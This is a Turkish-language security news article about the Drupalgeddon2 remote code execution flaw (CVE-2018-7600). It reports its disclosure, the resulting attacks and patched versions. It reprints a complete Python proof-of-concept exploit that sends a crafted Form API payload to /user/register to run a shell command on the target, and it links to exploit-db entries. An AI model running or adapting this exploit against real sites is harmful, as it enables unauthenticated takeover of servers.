Güvenlik Açıkları

Drupal’da bulunan RCE için exploit yayınlandı

2 dakikada okunur

Hacker’ların Drupal üzerinden bulunan RCE (Remote Command Execution) güvenlik açığı için kullanılan exploit’i yayınlamasından bu yana Drupal sistemlerine yapılan saldırılara inanılmaz bir miktarda artış var.

İki hafta önce yaklaşık olarak, Drupal güvenlik ekibi saldırganların savunmasız web sitelerini tamamen ele geçirmelerine olanak sağlayan Durpalgeddon2 adı verilen son derece kritik bir RCE güvenlik açığı keşfedildi.

Şirket bu güvenlik açığını gidermek için, Drupal CMS’in güncel sürümünü yayınladı ve bir milyondan fazla Drupal kullanılan sitenin saldırıya maruz kalmasını engelledi. Şirket bu güncellemeyi yaparken sistem üzerinden bulunan güvenlik açığı hakkında herhangi bir teknik yazı yayınlamadı.

İki gün önce, Check Point ve Dofinity‘deki güvenlik araştırmacıları, bu güvenlik açığına (CVE-2018-7600) ilişkin teknik detayları yayınladılar. Bu teknik yazıda, bir Rus güvenlik araştırmacısı, GitHub’da Drupalgeddon2 için bir Proof of Concept (PoC) istismar kodu yayınladı.

https://www.exploit-db.com/exploits/44448/
https://www.exploit-db.com/exploits/44449/
https://www.exploit-db.com/exploits/44482/

#!/usr/bin/env
import sys
import requests

print (‘################################################################’)
print (‘# Proof-Of-Concept for CVE-2018-7600’)
print (‘# by Vitalii Rudnykh’)
print (‘# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders’)
print (‘# https://github.com/a2u/CVE-2018-7600’)
print (‘################################################################’)
print (‘Provided only for educational or information purposes\n’)

target = input(‘Enter target url (example: https://domain.ltd/): ‘)

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
# proxies = {‘http’: ‘http://127.0.0.1:8080’, ‘https’: ‘http://127.0.0.1:8080’}
# verify = False
proxies = {}
verify = True

url = target + ‘user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax’
payload = {‘form_id’: ‘user_register_form’, ‘_drupal_ajax’: ‘1’, ‘mail[#post_render][]’: ‘exec’, ‘mail[#type]’: ‘markup’, ‘mail[#markup]’: ‘echo “;-)” | tee hello.txt’}

r = requests.post(url, proxies=proxies, data=payload, verify=verify)
if r.status_code != 200:
sys.exit(“Not exploitable”)
print (‘\nCheck: ‘+target+’hello.txt’)

Drupal’ın 6’dan 8’e kadar olan tüm sürümlerini etkileyen Drupalgeddon2 güvenlik açığı, saldırganların uzaktan kötü amaçlı kod çalıştırmalarına olanak sağlıyor.

Checkpoint’in açıklamasına göre, Form API (FAPI) AJAX istekleri yoluyla iletilen girdilerin yeterli önlem alınmamasıdan ötürü güvenlik açığı oluşuyor.

Check Point araştırmacıları, “Sonuç olarak, saldırganın iç form yapısına zararlı bir dosya veya kod parçası enjekte etmesini sağlıyor. Bu, Drupal üzerinde kimlik doğrulaması olmadan çalıştırılmasına olanak tanıyor.” dedi ve ekledi “Bu güvenlik açığından yararlanarak, bir saldırgan herhangi bir Drupal tabanlı bir siteyi tamamen ele geçirmesini sağlıyor.”.

Birçok kişi tarafından doğru ve ektili olarak çalıştığı söylenen PoC kodunun herkese açılmasından kısa bir süre sonra, Sucuri, Imperva ve SANS Internet Storm Center araştırmacıları Drupalgeddon2’yi kullanarak Drupal sitelere yönelik saldırıların başladığını gözlemlemeye başladılar ancak hiçbiri henüz saldırılara ilişkin bir rapor yayınlamadı.

Drupal’ın savunmasız sürümlerini kullanan site yöneticilerinin, CMS’yi Drupal 7.58‘e veya Drupal 8.5.1‘e en kısa sürede güncelleştirerek bu güvenlik açığını yamalamaları önerilir.

Güvenlik açığı, Şubat 2016’dan bu yana artık şirket tarafından desteklenmeyen Drupal 6’yı da etkiliyor, ancak bu sürüm için de bir yama oluşturuldu.

yazar hakkında
Siber Güvenlik Araştırmacısı olmaya çalışan bir Developer
Bunlar ilgini çekebilir
Güvenlik Açıkları

Windows SMB Protokolünü Etkileyen Kritik Bir Güvenlik Açığı Daha: SMBleed

4 dakikada okunur
Siber güvenlik araştırmacıları geçtiğimiz günlerde, Microsoft Windows Sunucu İleti Bloğu (SMB) protokolünü etkileyen ve saldırganların çekirdek belleğine uzaktan sızmasına izin verebilecek yeni…
Güvenlik Açıkları

NSA, E-posta Sunucularını Hedefleyen Yeni Sandworm Saldırılarına Karşı Uyarıyor

2 dakikada okunur
NSA, Rusya destekli hacker’ların Ağustos 2019’dan bu yana Exim e-posta sunucularında arka kapılar oluşturmak için saldırılar düzenlediğini söyledi. ABD Ulusal Güvenlik Ajansı…
Güvenlik Açıkları

MS Windows SMBv3 Protokolünde Kritik Güvenlik Açığı

1 dakikada okunur
Microsoft‘un popüler işletim sistemi olan Windows 10, dünya genelinde milyonlarca kişi tarafından kullanılıyor. Microsoft, 2015 yılından bu yana sürekli güncelleme alan Windows…
Siber güvenlik dünyasındaki gelişmeleri takip edin.
Verinizi gizli tutuyoruz ve sadece bu servisi imkanlı kılan üçüncü partiler ile paylaşıyoruz. Gizlilik Politikamızı okuyun.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

This site uses Akismet to reduce spam. Learn how your comment data is processed.